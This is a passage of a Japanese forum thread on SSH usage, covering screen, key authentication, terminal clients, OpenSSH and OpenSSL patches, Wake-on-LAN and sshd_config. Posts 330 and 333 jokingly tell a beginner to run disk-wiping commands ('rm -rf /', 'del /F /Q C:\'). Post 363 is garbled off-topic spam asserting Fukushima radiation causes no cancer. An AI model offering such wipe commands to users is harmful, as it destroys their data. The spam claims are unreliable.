その後はプログラムを走らせた状態でssh通信を終わらせたいのです。
今のところ
Ctrl+cでプログラムを終わらせてexitでssh通信を終わらせてるのですが、
どういう風にすればプログラムを起動させたままsshを終了できるのでしょうか。
また、更にその後、プログラムを止めたいと思ったときに、
再度sshでログインして、実行中のプログラムを止めるみたいなことも可能なのでしょうか?
linuxはyocktです。最近Intelのedisonを買ってみて
初めてlinuxのCUIを触ったもので全然勝手が分かっておらず・・・
303:名無しさん@お腹いっぱい。
16/01/29 12:01:20.91 .net
screen
LinuxならLinux板で聞きなよ
304:名無しさん@お腹いっぱい。
16/01/29 17:28:34.20 .net
ありがとうございます!
まさにそれが知りたかったです
SSHでスレタイ検索したのでUNIX板に来てしまったようです
失礼しました
305:名無しさん@お腹いっぱい。
16/02/01 03:30:09.46 .net
URLリンク(youtu.be)
306:名無しさん@お腹いっぱい。
16/04/22 08:34:58.21 .net
初歩的な質問なのですが
一台のマシンから複数のマシンに
鍵認証させるにはどうしたらいいのですか?
307:名無しさん@お腹いっぱい。
16/04/22 08:50:01.64 .net
複数のマシンに公開鍵置くだけ
308:名無しさん@お腹いっぱい。
16/04/22 09:09:29.01 .net
最初は使い方が良く分からなくて
鍵をサーバ側で作っていた時期もあったよ
おおらかな時代だったわ
309:名無しさん@お腹いっぱい。
16/04/22 10:28:46.61 .net
>>307
それが上手くいけまんでした
詳しお願いいたします
310:名無しさん@お腹いっぱい。
16/04/22 11:41:47.77 .net
>>309
"-v"つけて冗長出力を確認する
エスパーすると、パーミションの問題な気がするけど
311:名無しさん@お腹いっぱい。
16/04/22 12:04:19.34 .net
公開鍵認証とCA(自前の認証局)でユーザー認証とかってやったことある人いる?
312:名無しさん@お腹いっぱい。
16/04/22 14:12:48.81 .net
sshのフォントってどうやって変更できますか?
bashじゃないですよ
313:名無しさん@お腹いっぱい。
16/04/22 14:39:02.43 .net
>>312
sshでもなんでも、それ自体にフォントなんて無い。
sshの「何の」フォントを変更したいんだよ。
314:名無しさん@お腹いっぱい。
16/04/22 15:21:18.26 .net
sshの画面のフォントです
315:名無しさん@お腹いっぱい。
16/04/22 16:42:26.02 .net
sshの「何の」画面のフォントを変更したいんだよ。
316:名無しさん@お腹いっぱい。
16/04/22 17:11:49.06 .net
テラタームだ!
317:名無しさん@お腹いっぱい。
16/04/22 17:36:29.56 .net
テラタームならメニューの設定の中にフォントがあるで
318:名無しさん@お腹いっぱい。
16/04/22 18:15:20.09 .net
設定でフォントを変更しても豆腐になります><
319:名無しさん@お腹いっぱい。
16/04/22 18:24:59.54 .net
そうかーまあssh関係ないから勝手にがんばれ
320:名無しさん@お腹いっぱい。
16/04/22 18:48:37.46 .net
>>315
液晶の画面です
321:名無しさん@お腹いっぱい。
16/04/22 19:05:18.52 .net
sshの「何の」液晶の画面のフォントを変更したいんだよ。
322:名無しさん@お腹いっぱい。
16/04/22 19:12:23.61 .net
液晶?ほんとに?
フォントに~?
323:名無しさん@お腹いっぱい。
16/04/22 20:47:37.18 .net
カラー液晶です
324:名無しさん@お腹いっぱい。
16/04/22 21:05:20.83 .net
sshはカラー液晶には対応してません。
325:名無しさん@お腹いっぱい。
16/04/23 13:10:25.89 .net
端末側じゃなくてサーバー側のロケーィルとか文字クォードの問題かもしぬ。
問1.そのカラー液晶の画面とやらにつながっているコンピューターのOSが何か答えよ。
問2.そのコンピューターで日本語が表示されるかどうか答えよ。
問3.使用しているSSH端末エミュレーターの名称を答えよ。
問4.SSHでログインしているサーバーのOSが何か答えよ。
問5.SSHでログインしているサーバーのロケールを答えよ。
問6.おぬしにSSHを使えと言った奴が誰か答えよ。
326:名無しさん@お腹いっぱい。
16/04/23 17:05:26.03 .net
問1.NECです
問2.ケースを開ける時は電源プラグをコンセントから抜いてくださいと表示があります
問3.エミューレーターではありません 実物マシンです
問4.サーバーではありません
問5.サーバーじゃないのでわかりません
問6.シェルが使いたかっただけです
327:名無しさん@お腹いっぱい。
16/04/23 17:39:16.00 .net
>>326
よく聞け、新兵。これからお前が口からクソを吐く、その前と後ろにサーを付けろ。
NECなどというOSは存在しない。OSというはウィンドウズテンとかOSテンとかウブンツとかそういうものだ。
今から貴様のOSはNECではなくウィンドウズテンだ。もし違っているなら今すぐウィンドウズテンにするんだ。
次はターミナルだ。お前が使用しているのはテラタームだな。もし違っているなら今すぐテラタームをダウンロードしてインストールするんだ。
ここまでは出来ているんだろうな。よし、さっさとログインしてみろ。ユーザー名とパスワードを入力したな。
公開鍵を使用していないとしても、それはここでは大目に見てやろう。ただし今回だけだ。
uname -a
と入力してみろ。最後にエンターキーを押すのを忘れるな。
これでシェルが使えているのが分かっただろう。
何が問題か言ってみろ。
328:名無しさん@お腹いっぱい。
16/04/23 22:02:52.86 .net
'uname'は、内部コマンドまたは外部コマンド、
操作可能なプログラムまたはバッチ ファイルとして認識されていません。
329:名無しさん@お腹いっぱい。
16/04/23 22:25:35.30 .net
ドスプロンプトキタワーーーーー
330:名無しさん@お腹いっぱい。
16/04/24 12:11:37.08 .net
>>326
#のあとに、rm -rf /とタイプして"ENTER"キー押したらシェルが体験できるよ。
331:名無しさん@お腹いっぱい。
16/04/24 12:14:51.75 .net
'rm'は、内部コマンドまたは外部コマンド、
操作可能なプログラムまたはバッチ ファイルとして認識されていません。
332:名無しさん@お腹いっぱい。
16/04/24 12:17:04.65 .net
ドスプロンプトサイキョウーーーーー!
333:名無しさん@お腹いっぱい。
16/04/24 16:43:01.75 .net
del /F /Q C:\
334:名無しさん@お腹いっぱい。
16/04/24 17:40:39.15 .net
bash: del: コマンドが見つかりません
335:名無しさん@お腹いっぱい。
16/04/26 21:07:40.75 .net
コマンド窓だろ(´・ω・`)
336:名無しさん@お腹いっぱい。
16/04/27 14:27:46.62 .net
ログイン先がWindowsなのかニャ?
337:名無しさん@お腹いっぱい。
16/04/27 20:35:36.59 .net
ファイルをコピーするにはどうすればいいんでしょうか?
cpというプロンプトを使えと教えられたんですが、
やってみたら同じようなファイルが2つできただけで、
コピーはとれませんでした。
ちなみにログインシエルはSSHです。
338:名無しさん@お腹いっぱい。
16/04/27 20:37:15.06 .net
まず服を脱ぎます
339:名無しさん@お腹いっぱい。
16/04/29 14:43:02.56 .net
>>337
同じファイルが二つできたらそれはコピーだろう
340:名無しさん@お腹いっぱい。
16/04/29 15:34:37.99 .net
>>339
画面コピーのことだろ
読解力ないやつだな
もっと行間読めよ
341:名無しさん@お腹いっぱい。
16/04/30 02:05:36.16 .net
>>340
ファイルって書いてあるんですよねぇ。
コピーって印刷するってことかと思ったわ
342:名無しさん@お腹いっぱい。
16/05/01 13:27:33.14 .net
>>337
コンビニでファイル(紙)をコピーする。白黒なら一枚10円。
343:名無しさん@お腹いっぱい。
16/05/01 13:37:46.43 .net
コピーの意味がわからないとか、久しぶりに本物を見た気がする
344:名無しさん@お腹いっぱい。
16/05/01 13:46:59.20 .net
>>337
馬鹿だな。
今時、ゼロックスできないとかw
345:名無しさん@お腹いっぱい。
16/05/01 14:01:15.91 .net
昭和ホイホイのお時間です
346:名無しさん@お腹いっぱい。
16/05/01 20:51:52.10 .net
ファイルを移動するにはどうすればいいんでしょうか?
mvというプロンプトを使えと教えられたんですが、
やってみたらファイルの名称が変わっただけで、
ファイルは職場のパソコンの中のまま移動しませんでした。
ちなみにログインシエルはSSHです。
347:名無しさん@お腹いっぱい。
16/05/02 11:37:22.75 .net
>>346
そもそも mv を使ってファイル名が変わったということは
きちんとコマンド入力して 移動先 を指定したということで
その結果パソコンの中のままとかそういう表現はしない
ネタとしても3番煎じだし、適切な改行もマイナスポイント
素人のまねをしようとしても まともさはにじみ出てしまう
もっと狂気に身を委ねる必要があります
348:名無しさん@お腹いっぱい。
16/05/02 12:35:03.25 .net
>>346
省略語は嫌いだ。それは電子ファイル。電子ファイルとファイルは違う。
ファイルと言ったらコクヨに綴じたやつのこと。勝手に電子を省略しないように。
349:名無しさん@お腹いっぱい。
16/05/02 12:37:31.50 .net
電子ファイルなんて言葉ないんですが
350:名無しさん@お腹いっぱい。
16/05/02 13:40:16.32 .net
>>348
電子ファイルって何?
351:名無しさん@お腹いっぱい。
16/05/02 15:17:58.34 .net
>>348
いいぞ! その調子だ!
352:名無しさん@お腹いっぱい。
16/05/06 03:27:54.12 .net
ゆとりは文脈で判断できないから略せない
353:名無しさん@お腹いっぱい。
16/05/06 03:30:03.32 .net
レベル低いなSSH以前にコマンド板逝けよw
354:名無しさん@お腹いっぱい。
16/05/06 09:04:19.98 .net
>>353
そんな筋肉モリモリマッチョマンの変態板があるの?
355:名無しさん@お腹いっぱい。
16/05/06 16:41:29.39 .net
それはセクシーコマンドー板
356:名無しさん@お腹いっぱい。
16/05/06 18:27:13.36 .net
電子ファイルを電子コピーするにはどうすればいいんでしょうか?
電子cpという電子プロンプトを使えと教えられたんですが、
やってみたら同じような電子ファイルが2つできただけで、
電子コピーはとれませんでした。
ちなみに電子ログインシエルは電子SSHです。
357:名無しさん@お腹いっぱい。
16/05/07 01:16:10.29 .net
SSH板行けよ
358:名無しさん@お腹いっぱい。
16/05/07 10:18:33.43 .net
こいつ、面白いと思ってんのかな?
359:名無しさん@お腹いっぱい。
16/05/12 11:09:57.63 .net
SSHの暗号鍵を作成するとき、
RSAなんちゃらという表示と共に
○や・の落書きみたいな図が表示されますが、
それを生成するツールってなんでしょうか?
単独で使いたいので、手がかりだけでも
教えていただけるとありがたいです。
360:名無しさん@お腹いっぱい。
16/05/12 11:39:07.97 .net
>>359
printf じゃない?
361:名無しさん@お腹いっぱい。
16/05/12 11:44:37.23 .net
すみませんが詳しい方のみ回答をお願いします
362:359
16/05/12 19:43:13.56 .net
自己解決しました。アレはrandomart imageと呼ばれるものでした。
で、ツールはココ。
URLリンク(askubuntu.com)
363:名無しさん@お腹いっぱい。
16/05/29 16:23:50.28 .net
「ホテル 放射能」 を建設しようかと、考え始めています。
また、私たちの愚かな「放射能コワイ、コワイ」派の敵どもが、ギャーギャー騒ぐでしょう。
本当に、この愚か者たちは、自分の脳に張り付いた放射能恐怖症で、救いようのない者たちだと、思います。
10年後に死ぬ、おそらくそのうちの多くは、子供たちだと、この馬鹿たちは、信じ込んでいる。
私は、呆(あき)れかえる。福島では、誰も死なない。発病して死ぬ者はひとりもいない。そのように断言します。
私の同志は、山下俊一(やましたしゅんいち)長崎大学教授 (現在は、福島県立医大副学長も兼任している) である。
山下教授らに、バッシングの嵐を浴びせた者たちは、ずるい逃げ方をするな。「私は、そんなことは言わなかったよ」と言うな。
福島で放射能にせいで癌になる(放射能による癌は甲状腺がんだけである)人はひとりも出ない、という専門医学者の高田純の表明を私は尊重する。
専門家でもなく、放射能の人体への影響について、素人と同じくせに、偉そうに発言する者たちを、私たちは、厳しく排撃しなければならない。[1792]
どっちが福島の人間たちに対して、犯罪的か。「福島に近寄ってはいけない」と、実名で書いた者たちを、私たちは、記憶していなければいけない。
私、副島隆彦が今も不愉快なのは、学問道場の会員を止(や)めた人が、1000人ぐらい出たことだ。[1879]
「今も会員でいる人たちには、その人間としての余裕がある。]会員に求められる資質はこれである。
道場を退会した者たちは、まず自らの信念とは何かについて真剣に考えなければならない。[1880]
山下(俊一)先生が『汚染されたものを食べても大丈夫』とテレビで発表した後、
チェルノブイリで活動していたグループが山下先生に電話をしたら『立場上仕方がなかった』と答えた。
「山下(俊一)先生は ベラルーシbフ状況を全部知bチています。そbオてその情報を荘S部秘密にしてb「るんです。 だから秘密保全法なんです」―。
URLリンク(twitter.com)
364:名無しさん@お腹いっぱい。
16/07/13 21:20:29.88 .net
ずいぶん長い間ほったらかしだったPoderosaが有償化して戻ってきてるぞ!
試用は無期限にできると言うが...
URLリンク(ja.poderosa-terminal.com)
365:名無しさん@お腹いっぱい。
16/07/14 12:17:06.42 .net
さすがにその使用条件ではインストールして使ってみる気にもならない
366:名無しさん@お腹いっぱい。
16/07/14 12:31:21.24 .net
だからteratermで十分なのだよ
367:名無しさん@お腹いっぱい。
16/07/15 00:52:49.81 .net
ぼくは mintty ちゃん!
Windows10のコマンドプロンプトがちょっとマシになったそうだけどどうなの?
368:名無しさん@お腹いっぱい。
16/07/16 22:14:22.36 .net
スレ違い
369:名無しさん@お腹いっぱい。
16/07/25 10:41:14.80 .net
ではUbuntu on Windowsを有効にすると"Windows側に"sshサーバーがインストールされる話でもしようか
370:名無しさん@お腹いっぱい。
16/09/05 17:15:14.99 .net
>>369
続きはまだぁ?
371:名無しさん@お腹いっぱい。
16/09/25 18:35:23.03 .net
dropbearの話もここでいいの?
普段使いしてる人あんまいないかもだけど
372:名無しさん@お腹いっぱい。
16/09/29 23:55:07.98 .net
俺はiterm2
373:名無しさん@お腹いっぱい。
16/10/01 12:44:56.18 .net
31-168-172-143.telavivwifi.com とか
static-82-85-187-101.clienti.tiscali.it とか
bl20-203-6.dsl.telepac.pt とか
最近逆引きできる IP アドレスから突撃してくる奴が多いなぁ
374:名無しさん@お腹いっぱい。
16/10/01 19:59:49.47 .net
ただのbotnetやろ…
375:名無しさん@お腹いっぱい。
16/10/09 10:56:58.62 .net
dropbearのサーバーはOpenSSHにくらべて少し軽い気がする。
非力なマシンで使うと。
暗号負荷はそんな変わんないはずだから余計な前処理してないのかね
376:名無しさん@お腹いっぱい。
16/10/15 13:37:35.83 .net
Rlogin、上の方で言われていたフォント設定が面倒な点も改善されてて
単一軽量exeファイルで動作するとてもよいクライアントだと思う
ただ普通にシェル叩いてるぶんにはいいんだけど
midnight comander使うと枠線がうまく表示されない
設定いじればいいのかなぁ
377:名無しさん@お腹いっぱい。
16/11/03 19:01:26.82 .net
トリビア:OpenSSH 7.3p1 は OpenSSL 1.1.0b と組み合わせられない。1.0.x系のみ
誰かやってるはずだと思いながら自分で1.1.0対応パッチ書いて、
あとでやっぱ似たようなものがあると知ったorz
のだが、完成度では自分の書いたものが一番のようだ
378:名無しさん@お腹いっぱい。
16/11/03 19:03:42.42 .net
大本のOpenBSDでは OpenSSL 1.0.3からforkした LibreSSL を使っているので
影響は受けないというか見捨てられている。
今後どうするのかは各所様子見みたいね。
379:名無しさん@お腹いっぱい。
16/11/18 08:47:06.12 .net
1.0.1gからのフォークだね。
OpenSSHのMLでOpenSSL1.1.0サポートどうするよってなってるけど、結論出てないね。
抽象レイヤー独自で作るかなんてnode.jsも言ってたようなこと言ってたり。
URLリンク(marc.info)
380:名無しさん@お腹いっぱい。
16/12/02 08:51:47.45 .net
どうするんだろね(´・ω・`)
381:名無しさん@お腹いっぱい。
16/12/20 12:32:01.69 .net
7.4
382:名無しさん@お腹いっぱい。
16/12/21 19:11:10.97 .net
INSTALL
OpenSSL 1.1.x is not currently supported.
C89でもなんとかコンパイルできるのがまだ救いだ俺的には
383:名無しさん@お腹いっぱい。
16/12/24 10:28:34.71 .net
OpenSSH 7.4p1 の OpenSSL 1.1.0c 対応パッチ作成完了。
テストも通る。
test_utf8だけ通らないが漏れんとこのwcwidth()が腐ってるせいなので
どうにもならん。放置。問題ないだろたぶん
384:名無しさん@お腹いっぱい。
17/03/10 19:05:33.71 .net
macOSのsshの話もここでいい?
385:名無しさん@お腹いっぱい。
17/03/10 19:06:34.62 .net
OSXは中身Unixやで、というわけでおk
386:名無しさん@お腹いっぱい。
17/03/10 20:01:42.99 .net
Mac板でやった方がいいんじゃね
387:名無しさん@お腹いっぱい。
17/03/10 22:37:24.95 .net
Sierraのcronで他の計算機のデータをssh越しに自動でバックアップしようとして、rsyncのシェルスクリプト作ってログイン中にterminalとcronで動くことを確認した。
ところが、ユーザーがloginしていないと、なぜかkeychainに保存されてるpassphraseがcronの環境に読み込まれないので、errorになるっていう問題だけどMac板いくわ
388:名無しさん@お腹いっぱい。
17/03/11 02:42:43.57 .net
>>387
そりゃログインしてなかったらkeychainは使えないだろう
389:名無しさん@お腹いっぱい。
17/03/11 07:26:53.80 .net
そう言われてみるとそうですね。
ありがとうございます。
390:名無しさん@お腹いっぱい。
17/03/23 23:07:16.33 .net
7.5でOpenSSL 1.0.1ではconfigure通らなくなった
391:ich1
17/04/01 08:06:01.73 .net
URLリンク(goo.gl)
これは嫌だなー。。本当なの?
392:名無しさん@お腹いっぱい。
17/04/04 10:09:54.33 .net
goo.gl アドレスは無条件に非表示あぼ~んすると良いです
(99.99%がスパムなので)
393:名無しさん@お腹いっぱい。
17/04/04 19:51:35.81 .net
一方俺は OpenSSL-1.1.0 対応パッチを書いて勝利
今make test中 (超時間かかる)
394:名無しさん@お腹いっぱい。
17/04/05 10:06:26.88 .net
OpenSSH 7.5 のハイライトらしきもの:
・ssh-1 を本格的に捨てにかかっている。一部のコマンドは -1 を受け付けない。
・UsePrivilegeSeparationがデフォルトONになり、設定はdeprecatedになった
・鍵認証でログインするとSHAハッシュが記録されるようになった。
あとから追っかけるときに便利そう。(前からだっけ?)
Apr 5 09:28:12 saba sshd[27182]: Accepted publickey for ore from ::1 port 49525 ssh2: RSA SHA256:UfcrUWnSiFur5ra28VQoo7HgUShQueQ5LTnoJneZ48A
頑張ってOpenSSL-1.1に移植しても、
常用してるのはdropbearだからあんま意味ないじゃんと今更思った
395:名無しさん@お腹いっぱい。
17/04/05 12:44:28.64 .net
>>394
Dropbearといえばmosh 1.3.0で--no-ssh-pty optionがはいってDropbearでも使えるようになったよ
オプションつけるのめんどいけど
396:名無しさん@お腹いっぱい。
17/05/06 12:01:52.59 .net
ssh-1くたばった
397:名無しさん@お腹いっぱい。
17/05/12 02:00:27.48 .net
ド素人スマソ。 OpenSSH Windows版ぶっ込んだサーバーpcにスマホのクライアントアプリからwolさせるSSHコマンドてある?
ググったらether-wakeてのが出たけどこれなの?
教えてエロい人
398:名無しさん@お腹いっぱい。
17/05/12 06:51:49.86 .net
スマホ用のWake On LANアプリでよくね?
399:名無しさん@お腹いっぱい。
17/05/12 10:09:22.52 .net
>>398 レスサンクス。スマホのwolアプリてパケットが暗号化されてるかよくわからないのでSSHでやれたら良いなぁと思った訳です。
400:名無しさん@お腹いっぱい。
17/05/12 18:10:39.13 .net
>>399
何を何のために暗号化したいの
WOLはネットワークインタフェースカードの限られた部分で処理するから暗号化なんてしてたら処理できないんじゃ
401:名無しさん@お腹いっぱい。
17/05/12 18:18:57.58 .net
MACアドレスとか入ってるからじゃない?
WiFiが暗号化されてれば問題ないはずだけどね
402:名無しさん@お腹いっぱい。
17/05/12 19:03:49.37 .net
>>400>>401 レス感謝!ガチなド素人なもんでホントスマン。その暗号化が必要かどうかもわかってないもんで。
もともとは使ってる某NECルーターにある「ホームipロケーション」という簡易ddns機能的な奴を使って外部からwolをしようとしたら送信画面が暗号化されてない事に気付いて、これをなんとかしようと思った訳です。
よっぽどヤマハのルーターでも買ってやろかと思ったけどSSHサーバーぶっ込むの面白そうだなとチャレンジ中。
403:名無しさん@お腹いっぱい。
17/05/12 21:27:07.67 .net
>>402
外部とルータ間の通信の暗号化は必要かもしれない
誰かが認証を盗聴したら同じことができてしまうからね
もしsshで接続できたとしたら、そのPCは起動しているだろうからWOLは不要
wake on lanはその名の通りLANで使うもの
同一ネットワーク内の全ての端末に簡単な通信パケットを送って各自がそれを見て自分宛だったら起動する
基本的には他のネットワークからは起動できない
だからルータにその機能がよくついている
外部端末とルータ間の通信の暗号化をお勧めする
またはVPNとか
404:名無しさん@お腹いっぱい。
17/05/12 22:03:21.63 .net
>>403 エスパー発見!ありがとうございます。聞きたい事が全て先回りで答えが出てる感じ。やっぱVPNか。最初はpcをvpnサーバにしようかと思ってたところノーパソサーバ化&常時起動は火災の元みたいなスレ見てwolの適時起動にしようかと思ったの。
お騒がせしました。壮大なスレチでスマソ。
405:名無しさん@お腹いっぱい。
17/05/12 22:06:55.05 .net
>>404
VPN鯖にしたいだけならラズパイみたいなボードPCをおすすめしておく
406:名無しさん@お腹いっぱい。
17/05/12 22:17:36.68 .net
>>405 ラズパイ考えてた!スペックの低い端末を鯖にした時の通信速度が心配で候補から外してた。(あと敷居が高そうで)
メガサンキュー!方向性が見えてきた。
407:名無しさん@お腹いっぱい。
17/05/12 22:52:24.60 .net
>>406
余程古い環境以外は通信速度のほうがボトルネックになるからそこまで気にしなくてもいいと思うけどなー、まあ敷居が高いのは言えてるが
408:名無しさん@お腹いっぱい。
17/05/13 06:11:14.50 .net
ルータにVPNないなら
常時稼働ラズパイにsshで繋いでwolでも簡単だね
409:名無しさん@お腹いっぱい。
17/05/13 09:09:21.09 .net
ここの人はスマホのSSHクライアント使ってる?
便利だけどすごく不安だわ
悪意のあるクライアントだと秘密鍵・パス・ホスト名を送信してるかもって思う
410:名無しさん@お腹いっぱい。
17/05/13 13:08:41.32 .net
>>409
Connectbotとターミナルのdropbear使ってる、ソースあるし
411:名無しさん@お腹いっぱい。
17/05/13 22:43:39.42 .net
なるほどオープンソースのクライアントを使えばいいのか
412:名無しさん@お腹いっぱい。
17/05/14 07:27:18.76 .net
自分でビルドせずにストアから入れる場合は
そのソースから変更されないでビルドされてること確認しないとな
信頼できるディストリビューターって楽だな感謝
413:名無しさん@お腹いっぱい。
17/05/15 09:51:54.30 .net
どういたしまして
414:名無しさん@お腹いっぱい。
17/05/21 03:07:43.78 .net
いいってことよ
415:名無しさん@お腹いっぱい。
17/06/27 18:28:55.10 .net
一度ログインできたホストに対して、コネクション落ちた後とか
何らかのきっかけで再ログインしようとした時に
「ssh_exchange_identification: Connection closed by remote host」
になる場合ってどういう原因でなりやすいの?
現状だと仮想マシンで運用しているからバックアップの仮想マシン
のスナショを新たに複製してそっちにはログインできる。
ログインできなくなったVMは使い捨ててるけど流石にめんどくさすぎる。
どうすれば効率よく再ログインできるようになる?
416:名無しさん@お腹いっぱい。
17/07/04 13:04:11.97 .net
見たことなかったのでぐぐってみた。
sshd_configのMaxStartupsを増やすと解決することもあるらしい。
417:名無しさん@お腹いっぱい。
17/07/09 17:24:51.18 .net
tor ってsshポートフォワードで不特定多数のサーバプロキシしてんの?
レイヤがよくわからん
418:名無しさん@お腹いっぱい。
17/07/09 23:38:21.08 .net
>>417
sshスレにいるってことは公開鍵暗号を理解してる前提で説明すると
複数のtorノードをピックアップして各ノードの公開鍵で次のような入れ子の暗号データを作る
ノード1の公開鍵(ノード2の公開鍵(ノード3の公開鍵(オペレーション)))
ノード1が上のデータを受け取ると自分の秘密鍵で復号化してノード2に送る
ノード3まで来ると復号化した時にオペレーションが見えるので実行する
各ノードは最終ノード以外あといくつのレイヤがあるか分からない
419:名無しさん@お腹いっぱい。
17/07/10 01:56:21.15 .net
>>418
うっわぁ・・・手が込んでるなこれ
接続結構遅くなるんじゃない?
鍵交換の猶予時間厳しくすればTorだけ弾けたりするのかな。
だめだ、最後のノードしか関係ないんだよな。
手動でしか鍵作ったことないけどssh-keygenとかそういう諸々は
自動化されてるのか?
転送先ってランダムなんでそ?
420:名無しさん@お腹いっぱい。
17/07/10 06:57:41.00 .net
Torのスレでやった方がいいんじゃね
421:名無しさん@お腹いっぱい。
17/07/15 11:25:48.21 .net
いまさら気づいたが
ESXi 6.0 入れたら
同梱の ssh が dropbear じゃなくて OpenSSH のものになっていた。
422:名無しさん@お腹いっぱい。
17/08/15 14:16:08.91 .net
CentOS7の、OpenSSH6.6を使ってます
マシンにはLANインタフェースが3つあり、1つはインターネットへ、2つは内部用です
ここで、インターネット用のインタフェースだけ、SSHのポートを例えば2222に変更、それ以外は標準の22で利用したいと思ってます
sshd_configに、port 2222、ListenAddressにIPアドレス:22と書けば良いという情報を見つけたのですが
このListenAddressをカンマ区切りやスペース区切りなど色々と試しましたが複数の指定はできないらしく、
また0.0.0.0:22を指定するとインターネット用インタフェースでも22番をリッスンしてしまいます
結局、sshd_configは諦めて、iptablesによるフィルタリングとポートフォワードを併用して実装はしているのですが、
sshとiptablesの両方が設定に絡んでいて、分かりづらくなっているのを改めたいです
sshd_configで上記のような設定をすることは可能ですか?
423:名無しさん@お腹いっぱい。
17/08/15 15:46:01.85 .net
ListenAddressは複数行かけるだろ
424:名無しさん@お腹いっぱい。
17/08/15 15:47:02.20 .net
Linuxの話はLinux板で聞いてください